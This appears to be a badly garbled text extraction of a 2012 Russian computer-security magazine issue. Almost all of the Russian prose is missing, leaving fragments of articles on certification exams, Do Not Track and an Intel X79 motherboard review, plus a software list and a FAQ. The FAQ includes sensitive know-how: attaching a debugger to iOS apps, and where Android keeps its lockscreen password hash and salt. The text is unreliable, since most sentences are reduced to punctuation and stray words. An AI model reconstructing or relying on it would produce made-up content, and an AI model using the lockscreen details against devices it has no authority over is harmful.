, - ,
. , , , ,
, .
, MCSE
. ? 80%
. ,
- .
, .
, Microsoft
2006-,
.

Microsoft 1000- 700. ,


. , , , .
, ,
.

(, 70-662: www.microsoft.com/learning/en/us/exam.
aspx?id=70-662).
. , ,
.
1. . ,
, . ,
, , , , . -
. Measure up
. , ,
, -

?
,
. . -, - ,
130
0130

2012
07
06 /162/
/161/ 2012

Drupal

.
(MOC) .
. , Backup/
Restore Exchange. ,
( , ,
, Dial Tone ).
, ,
.
, ,
(
).
100%- .
2. . MCTS Self
Paced Training Kit
, -
, - Exchange,
SharePoint. , 16
RAID-. Self Paced Training
Kit , :
Self Paced . Training Kit ,
.
,
8001500 .
.
MCSE. , - . ,
.
3. .
. , , ,

. , . , - .
: .


. ,
,
80

?
. , ,
80 .
,
, . Measure up,
, .
. ,
, , . , ,
.
. ,
. Exchange 2010, , ,

, Lotus.
( ),
,
. / -. ,
, .
. , ,
, , , .
, .
- , .
, . ,
.
. ,
?.
, - . ,
( ) .
.

2012
07
06 /162/
/161/ 2012

700 , , , . , . ,

MCTS .
,
, , .
,
.
, . ! z
131
0131

Mifrill (mifrill@real.xakep.ru)

DO NOT TRACK
do not track . , , , - ,
? , Twitter,
Do Not Track .
132

07 /162/ 2012

Do Not Track


. , , .
:
.
,
. .
Google,

. , Facebook
<bgsound>
e-mail.
,
.
, , :
, . ,
, .

( ,
),
. Do
Not Track ,

- .



Do Not Track, .
, .
, Do No
Track? HTTP-,
: 1 (DNT: 1)
,
; 0 ; null
. ,
1,
.

, 2009 Firefox
, DNT-

,
?

(SEO)

(donottrack.us).
Firefox 4. 2010
Microsoft,
Do Not Track IE9. Do
Not Track
Mozilla Firefox, Apple Safari
Opera. , HTTP-
DNT , Firefox
DOM-
Do Not Track JavaScript.
, Chrome?
. ,

,
Chrome . Chrome, , Keep My Opt-Outs. :)
DNT ,

,

. Do Not Track
(W3C).

Twitter Do Not Track

07 /162/ 2012

DNT ?
. , ,
Ghostery, ScriptNo, Adblock Plus ( Tor,
),
. DNT

.
,
Google, .

cookie (, -
, e-mail )

YouTube
cookie , DNT.
, Internet and Society
,
.
64
Advertising Option Icon
Do Not Track. , 33
cookie
,
.
, , Do Not Track .
, . ,
Do Not Track Twitter!

,
,
,
.
Do Not Track
, .
, Do-Not-Track
Online Act of 2011.



. ,
,
.
, ,
DNT ,
,
cookie HTTP-. , . z

133

FERRUM

!

INTEL X79 EXPRESS
,
,

.
, Intel.
.
Intel X79 Express
.
. , ,
Intel Sandy Bridge-E
, 200 , . 350 .

. ,
, -
2530 .
, ,
,
. , , !

!
. , - .
,
Intel X79 Express Intel P67
Express Intel Z68 Express.
.
, SSD-
BCLK.
USB 2.0, SATA-II SATA 3.0.
Intel X79 Express
Intel Sandy Bridge-E. -

134


40 PCI Express 3.0
DDR3.
, Intel Sandy Bridge-E ,
.
, , .
.

X79
PCI Express 3.0

. -
. ,
AMD Radeon HD 79XX
PCI Express 3.0.
, ,
c PCI Express 2.0, ,
. ,
.
.
DDR3 ,
. , ,
.


: .

ASRock X79 Extreme4-M


ASUS Rampage IV Extreme
Foxconn Quantumian 1
GIGABYTE GA-X79-UD5
Intel DX79SI
MSI X79MA-GD45


:
Intel Core i7-3960X, 3,3
:
Thermaltake Frio OCK
:
MSI Twin Frozr II HD 5830, 1024
:
G.Skill F3-17000CL9D-8GBXM,
44
:
Corsair CSSD-F120GB2, 120
:
ENERMAX Platimax, 750
:
Windows 7


.

25, 13.33. ,

, BCLK
CPU RAM. , CPU Strap,

125, 166 250 .

, 125
.
166
,
.
250
, .
125 .
.

Intel Sandy Bridge-E Intel Core i7-3820
125 36 = 4500 .
!
, .
,
.

wPrime
1.55 ( 1024m), WinRAR 4.0 ( ) Super Pi 1.5XS ( 1m).

07 /162/ 2012

ASROCK X79 EXTREME4-M


, 79- - mATX ?
!

. , Extreme
ATX- ASRock Extreme3, Extreme4,
Extreme6GB, Extreme7 Extreme9.
- mATX ,
. , PCI Express x16 PCI.
PEG 16 + 16 + 8. 3-Way SLI
3-Way CrossFireX :
. , - mATX-
. SLI/CrossFireX !
ASRock X79 Extreme4-M
/ POST-.
BIOS.
.
, .
. , ,
X-FAN.
, , . , CPU
Strap, 125 .
, . ASRock X79 Extreme4-M
. 105 .

7000
.

ASUS RAMPAGE IV EXTREME


, ,
, ASUS
Rampage IV Extreme. , . , PCI
Express x16. 16 + 16 + 16 + 16.
8. , PEG PCI Express x1.
ASUS Rampage IV Extreme RoG (Republic of Gamers),
, - . , OC Zone /
, POST,
. PCI Express, LN2 Slow.
?
! OC Key. I/O ,
Windows BIOS. . , -
.
, , Extreme
Engine Digi+ II.
, , .
, .
, ASUS Rampage IV
Extreme .
133 !

13 000
.

07 /162/ 2012

135

FERRUM

FOXCONN QUANTUMIAN 1
, . /
. DIMM LED-
POST- ,
. .
Foxconn Quantumian 1 32 .
PCI Express x16.
.
16 + 16. ,
PCI Express x1 PCI.
PCI Express x16
16 + 8 + 8 + 8.
. BIOS , ! Performance
.
. BIOS.
.
VCore, VTT , . ,
, 0,97 .
Default. BIOS Foxconn Quantumian 1
132,5 . ! !

9000
.

GIGABYTE GA-X79-UD5
GIGABYTE GA-X79-UD5
79- .
- E-ATX
DIMM, PCI Express x16, PCI Express x1 PCI.
Power,
. OC-Dual
BIOS, , Clear CMOS.
SATA. GIGABYTE GA-X79-UD5 !
PCI-E-
Bluetooth- Wi-Fi-. , .
3D Power 3D BIOS . : GIGABYTE GA-X79-UD3,
GIGABYTE GA-X79-UD5 ,
.
.
130 .

4DDR3, 10662400
3PCI Express x16, 1PCI
4SATA II, 3SATA 3.0, 1eSATA 3.0
Ethernet, 10/100/1000 /

:
:

7.1 CH, HDA


6USB 2.0, 2USB 3.0, 2S/PDIF,
1eSATA, 1IEEE1394, 1RJ-45, 2PS/2,
6
mATX

136

ASRock X79
Extreme4-M

:
:
:
:

-:

9000

Foxconn Quantumian1

ASUS Rampage IV
Extreme

8DDR3, 10662400
5PCI Express x16, 1PCI Express x1
4SATA II, 4SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /; Bluetooth v2.1
+ EDR
7.1 CH, HDA
8USB 2.0, 4USB 3.0, 1S/PDIF, 1Bluetooth,
2eSATA, 1RJ-45, 1PS/2, 5

4DDR3, 10662400
4PCI Express x16, 1PCI Express x1, 1PCI
6SATA II, 4SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /

E-ATX

ATX

7.1 CH, HDA


6USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
2RJ-45, 1PS/2, 6

07 /162/ 2012

INTEL DX79SI
! , Intel
DX79SI. , Intel ? , Intel Extreme Edition
.
Intel DX79SI DIMM, 64 . , PCI
Express x16, 16 + 16 + 16.
PCI Express x1, PCI.
SATA- ,
Intel X79 Express . . , , . Intel DX79SI
Bluetooth Wi-Fi. USB 3.0.
Intel DX79SI . ,
, 104,7 .
. . ,
LED- POST-. ,
hwbot.org,
DELLY, Intel DX79SI 135 .

10 000
.

MSI X79MA-GD45
MSI X79MA-GD45 .
!
DIMM ,
.
64 2400 . PCI
Express x16 3.0 ,
. ,
, PCI Express x1.
MSI
Military Class. Intel
X79 Express .
DrMOS II, 130 , SFC, Hi-c
.
. !

130 . , .

7000
.


GIGABYTE GAX79-UD5

Intel DX79SI

Intel Core i73960X

8DDR3, 10662133
3PCI Express x16, 2PCI Express x1, 1PCI
4SATA II, 6SATA 3.0, 2eSATA 3.0
Ethernet, 10/100/1000 /; Bluetooth v4.0;
Wi-Fi 802.11n
7.1 CH, HDA
7USB 2.0, 2USB 3.0, 1S/PDIF, 2eSATA,
1IEEE 1394, 1RJ-45, 1PS/2, 5

8DDR3, 10662400
3PCI Express x16, 2PCI Express x1,
1PCI, 4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /;
Bluetooth; Wi-Fi
10 CH, HDA
6USB 2.0, 2USB 3.0, 1S/PDIF,
1IEEE 1394, 2RJ-45, 5

4DDR3, 10662400
2PCI Express x16, 2PCI Express x1
4SATA II, 2SATA 3.0
Ethernet, 10/100/1000 /

E-ATX

ATX

mATX

07 /162/ 2012

7.1 CH, HDA


6USB 2.0, 2USB 3.0, 2S/PDIF,
1RJ-45, 1PS/2, 6

,
, .

,
ASUS Rampage IV Extreme
,

. Foxconn Quantumian 1
, .
, RoG-
, Quantumian 1
. z

137


WPRIME 1.55 1024M, C

SUPER PI 1.5XS 1M, C

MSI X79MA-GD45

MSI X79MA-GD45

Intel DX79SI

Intel DX79SI

GIGABYTE GA-X79-UD5

GIGABYTE GA-X79-UD5

FOXCONN Quantumian 1

FOXCONN Quantumian 1

ASUS Rampage IV Extreme

ASUS Rampage IV Extreme

ASRock X79 Extreme4-M

ASRock X79 Extreme4-M


0

50

100

150

200

250

0 2 4 6 8 10 12 14 18 20
Super Pi 1.5XS

BCLK,
MSI X79MA-GD45
Intel DX79SI
GIGABYTE GA-X79-UD5
FOXCONN Quantumian 1
ASUS Rampage IV Extreme
ASRock X79 Extreme4-M
0

20

40

60

80

100

120

140

. ,

WINRAR, /
MSI X79MA-GD45
Intel DX79SI
GIGABYTE GA-X79-UD5
FOXCONN Quantumian 1
ASUS Rampage IV Extreme
ASRock X79 Extreme4-M
0

500

1000

1500

2000

Intel , ASUS Rampage IV Extreme

2500

3000

3500

4000

>Net
Ammyy Admin 3.0
Colasoft MAC Scanner Free 1.1
Echofon 1.0.5
Gmvault 1.5
Mail Notifier Beta
Maxuden Radio Station 2.4
NetBScanner 1.0
NetSpeedMonitor 2.5.4.0
ooVoo 3.5.1
Snackr 0.41
Tango 1.6
TCPEye 1.0
Tiggit

>Multimedia
aTunes 2.1.0
CloudTune 1.9
Convertidor De Videos
Falco GIF Animator 3.9
FreeMake Video Downloader 3.0.1
FreeVimager 3.9.9
LameXP 4.04
MediaMonkey 4.0.3
Metanull 1.1
Passport Photo Maker
Redimensionneur 1.0.1
Ringtone Maker 2.4
SuperEasy Codec Checker 1.09
Textaizer Pro 4.3
TinEye Client 1.1
Tomahawk 0.4.2

>Misc
CaPNotifier 1.1.1.0
EyeDefender 1.09
FiletypeID 0.2.1.7
Instant Elevator Music 2.1
Just Manager 0.1 Alpha
MacType 2012
Media Preview 1.2
Multibar 1.1.1.1
MultiWall 1.0.16
PDF Preview 1.0
Proto 0.6.9.7
sTabLauncher 2.2.3
ViPad 1.0
ViStart 2.0
WinMend File Splitter 1.2.9
XWidget 1.4

>>WINDOWS
>Development
BlueGriffon 1.5.2
Boost 1.49.0
DbVisualizer 8.0.9
dirtyJOE 1.5
FaceSDK 4.0
GanttProject 2.5.2
GDIView 1.15
Gobby 0.5
InstallSimple 2.5
mongoDB 2.0.5
Parrot 4.4.0
RocketSVN for Visual Studio 1.0.1
RocketSVN Server 1.0
SciTE 3.2.0
Sqliteman 1.2.2

>>UNIX
>Desktop
Aegisub 2.1.9
Devede 3.22.0
Dvdx 4.0.1.0
Ede 2.0
Flvtomp3 1.2.1
Gimp 2.8.0
Impro-visor 5.16
Kdenlive 0.9
Openoffice 3.4
Outwiker 1.6.0
Phatch 0.2.7.1
Rosegarden 12.04
Scribus 1.4.1
Shutter 0.88.3
Specto 0.4.1
Sview 12.05

>System
DrivePurge 1.0
DXVA Checker 2.8.2
Ext2Fsd 0.51
GeekUninstaller 1.0.1.3
iReboot 1.1.1
JetClean 1.2.0
Metamorphose 1.1.2
Prio 1.98
ProcessEye 1.0
Security AutoRun 1.3
SlimCleaner 3.0
SSD Fresh
StartupEye 1.0
Undela 3.8.3
WinScheduler 7.5.2
Wise Data Recovery 3.11

>Security
AxCrypt 1.7
BitDisk 5.2.0.8
Browser Cleaner 1.2
BugChecker 0.1.149
CERT Failure Observation Engine
(FOE) 1.0
Cintruder 0.2
DeEgger Embedder 1.09
Drivesploit
Egurra 0.1
EMET 3.0
Knock 1.5
Nmap 6.0
Ophcrack 3.4.0
Ostinato 0.5
Rips 0.53
Scapy 2.2.0
Secure Bin 1.0
Secure Wipe 1.0
SIPVicious 0.2.7
Sqlcake 1.1
SQLmap GUI
SteadyCrypt 2.4
USB Disabler 1.1
VERA 0.3

Waterfox 12.0
Wi-Fi Inspector 1.2.1.4
Zona 1.0

>Security
APKinspector BETA
cintruder 0.2
Drivesploit
Graphem 0.3.2
Hacme Bank - Android v1.0
Ispfw 10
METASM 0.1
netsniff-ng 0.5.7
Nmap 6
Nmap 6.00
slowhttptest 1.4
spooftooph 0.5.2
sqlcake 1.1
SQLmap GUI
SWFREtools
Turboshredder 0.033
Usbcryptformat 12.05.20
Volatility 2.0
Wifite 2.0
Wireshark 1.6.8

>Net
Backup-gmail 0.1.2.1
Coccinella 0.96.20
Deluge 1.3.5
Firefox 12.0
Grive 0.0.4
Homer-onferencing 0.23
Hostapd 1.0
Jitsi 1.1
Lightspark 0.5.7
Nethogs 0.8.0
Opera 11.64
Scr 0.8
Sflphone 1.1.0
Smuxi 0.8.9.2
Tickr 0.6.0
Transmission 2.52
Tv-maxe 0.07
Ymono 5.0a

>Games
Turtle_arena 0.6
Ufoai 2.4

>Devel
Ajaxml
Aptana 3.1.2
Atom
Betterpoeditor 1.0
Catalyst 5.90012
Codeigniter 2.1.0
Cppcheck 1.54
Firmin 1.0.0
Ganttproject 2.5.2
Gpac 0.5.0
Llvm 3.1
Monodevelop 3.0.1
Netsgraph 1.0.004
Opengrok 0.11.1
Perl 5.16.0
Qtcreator 2.5
Tig 1.0
Zengl 0.3.0b3

Xfce 4.10
Zxtune b1716

>>MAC
Ambientweet 1.1
Bartender 0.9.05
Blender 2.63a
CheatSheet 1.0.1
CornerClick 0.9
Friendz 4.2.5
Gmvault 1.5
ipswDownloader 2.2.0
Loginox 1.0.6b5
Mac Malware Remover 1.1.5
MagicPrefs
Quicksilver 68
SMARTReporter 3.0.1
SMBUp 1.4.0
SourceTree 1.4.2
SpeedTao 0.9.5
Tomahawk 0.4.2
Trillian 1.3.37

>X-distr
Linux Mint 13

>System
Bluelog 1.0.3
Ck 3.3
Drizzle 7.2.2a
Laptop_mode 1.61
Linaro 12.04
Linux 3.4
Loganalyzer 3.4.3
Nomachinenx 3.5.0
Nvidia 295.53
Orientdb 1.0
Pulseaudio 2.0
Sdfs 1.1.3
Systemrescuecd 2.7.1
Virtualbox 4.1.16
Wine_etersoft

>Server
Apache 2.2.22
Asterisk 10.4.1
Bind 9.9.1
Cups 1.5.3
Dhcp 4.2.3-p2
Dovecot 2.1.7
Freeradius 2.1.12
Lighttpd 1.4.30
Mysql 5.5.24
Nsd 3.2.10
Openldap 2.4.31
Openvpn 2.2.2
Postfix 2.9.3
Postgresql 9.1.3
Pure-ftpd 1.0.35
Samba 3.6.5
Sendmail 8.14.5
Snort 2.9.2.3
Sqlite 3.7.12.1
Squid 3.1.19
Syslog-ng 3.3.5
Unbound 1.4.17
Vsftpd 3.0.0

07 (162) 2012

 




glqdoa{}
pqdtcgomk
-!),25'2/50



kdldcedo
n_idqmacj~
7).$/73



f_vdk
imcgq{
l_3#!,!






 *04






1)1$(*

8889",&136

  





odimkdlcma_ll_~

k
HIGHLOAD

FAQ

, Digital Security (cherboff@gmail.com)

FAQ


FAQ@REAL.XAKEP.RU


IP ,
?

A ,
, .


,
. Linux ifconfig:

ifconfig eth0:alias1

alias1 .
Windows
TCP/IP.
IP IP- .
,
Q Bitlocker,
- Linux?
, Windows Vista
A
Bitlocker. ,

. ,

(Linux / Mac OS X)
dislocker (bit.ly/dislocker).
,
.
,

NTFS. ( ,

.)

FUSE.
,
(
, ).
USB, .

, .

VLAN?
, ,
A VLAN,
.
, , -

, trunk (
,
, ),
.
VLAN ID
. Linux
8021q, Ethernet.
sudo modprobe 8021q

vconfig (
-
,
vlan). , VLAN ID = 1337 eth1:
sudo vconfig add eth1 1337


eth1.1337,
MAC- IP-.
VLAN ID 1337. Windows, ,
,
.
, -

IPHONE?
,
IDA Hex-Rays.
,
,
. ,
iOS,
. ,

IDA +
debugserver (GDB-server iOS).

140

OSX (
) c iOS SDK iOS- . iPhone
( XCode) , ,
( root) .

SSH. ,
, IDA.


iOS SDK fat-elf
( ,
,
) . , iPhone.
lipo
ARM7:

lipo -thin armv7 /Developer/usr/bin/


debugserver -output gdb-srv

07 /162/ 2012

FAQ

,
.
VLAN ID
,
.
.

PROSet, Intel.

VLAN ID.

,
LAN, DHCP
, ?
192.168.0.1,
. ?
,
A .
-
.

MAC-
, ,
( pingscan
ARP-). TCP SYN-
IP ,
, MAC-

(
IP- ,
).
, ,
(- IP-
),
, .
, ! ,

. gatewayfinder (https://bit.ly/gwfinder).
Python
scapy, TCP.
IP, ,
MAC.

.

,
,
. ,
,
,

XML (pastebin.com/g8SFczFz) iPhone.



(
XML)
ldid. Cydia
( AppStore'
):

ldid -Srules.xml gdb-srv

07 /162/ 2012

Brainfuck, JS.
: ,
- ,
,
JS- Revelo (bit.ly/Revelo).
,

,
DOM,


.
,
,
.



JAVA SCRIPT

.
,
?

Revelo JavaScript

, .

Notes. -x :
springboard.

~/ gdb-srv -x spring host:1337 \


/Applications/MobileNotes.app/MobileNotes

GDB

.

IDA
GDB (Debugger
Attach Remote GDB).
(Debug options
Edit Exeptions)
SIGSTOP, Stop program.
, IP
, iPhone.
, ,
iOS-,
.

141

FAQ

Flash-.
Flash
A HTML5, Flash
-

.
,
, , .

, . ,

,
SWF Investigator (adobe.ly/swfinv),

. -,
Adobe Labs! , ,

?
SWF-
,
,
.
- , ,
, flashvars Action
Message Format. AtcionScript, HEX-
Local Shared
Objects (Flash cookie).

byte[] hashed = null;


try {
byte[] saltedPassword =
(password + getSalt()).getBytes();
byte[] sha1 = MessageDigest.
getInstance(algo = "SHA-1").
digest(saltedPassword);
byte[] md5 = MessageDigest.
getInstance(algo = "MD5").
digest(saltedPassword);
hashed = (toHex(sha1) + toHex(md5)).
getBytes();
}
catch (NoSuchAlgorithmException e) {
Log.w(TAG, "Failed to encode
string because of missing
algorithm: " + algo);
}
return hashed;

Android
?
, 2.2
A Android

, .
, , .
:

public byte[] passwordToHash(


String password)
{
if (password == null) {
return null;
}
String algo = null;

,
, .
/data/system/password.
key, ,
. ,
, lockscreen.password_salt
SQLite, , ,
/data/data/com.android.providers.
settings/databases/settings.db.

,
.
?
,
A
,

Scalpel (bit.ly/frscscalpel),
.
,

.


,
.
, ,

. -


,

,
SCALPEL
142

.
PDF:
pdf

5000000

%PDF

%EOF\x0d

REVERSE

pdf
,
, , %PDF
%EOF\x0d .
REVERSE
,
. ,
.
Ctrl + C
bash
-
.
- ^Cuser@hostname:~#.
,
- ?
bash, ,
A ,
,
.

, ,
:).
,

( ,
#
).
,
ESC-, .
:

PS1="\[\033[G\]$PS1"


$PS1, .bashrc
(
).
RFC-
?

A
,
, ,

.
, ,

, ,
,
RFC ,
Pretty-rfc (bit.ly/prettyrfc).
,
. z

07 /162/ 2012

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

FAQ

WWW2
LOAD IMPACT

loadimpact.com
, -
( , ), ab ( Apache) Tsung.
- ? . , .
Load Impact 50 000
.
. , . Load Impact
. ,
.

SQL-

sqlfiddle.com
SQL , ,
, . , , SQL Fiddle . ,
SQL,
SQL- . ,
, , (Execution Plan). : MS SQL Server, MySQL, Oracle, PostgreSQL, SQLite.
( Fiddle) ,
, .

snag.gy
,
. , (,
- ),
. , , ,
.
(,
Print Screen), snaggy
, .
.

Web 2.0
IRC-

https://irccloud.com
, #xakep
. IRC, ,
.
-
. IRC- ,
( mIRC),
-. IRCCloud, ,
. , - .

SQL FIDDLE

SNAGGY

IRCCLOUD

144

07 /162/ 2012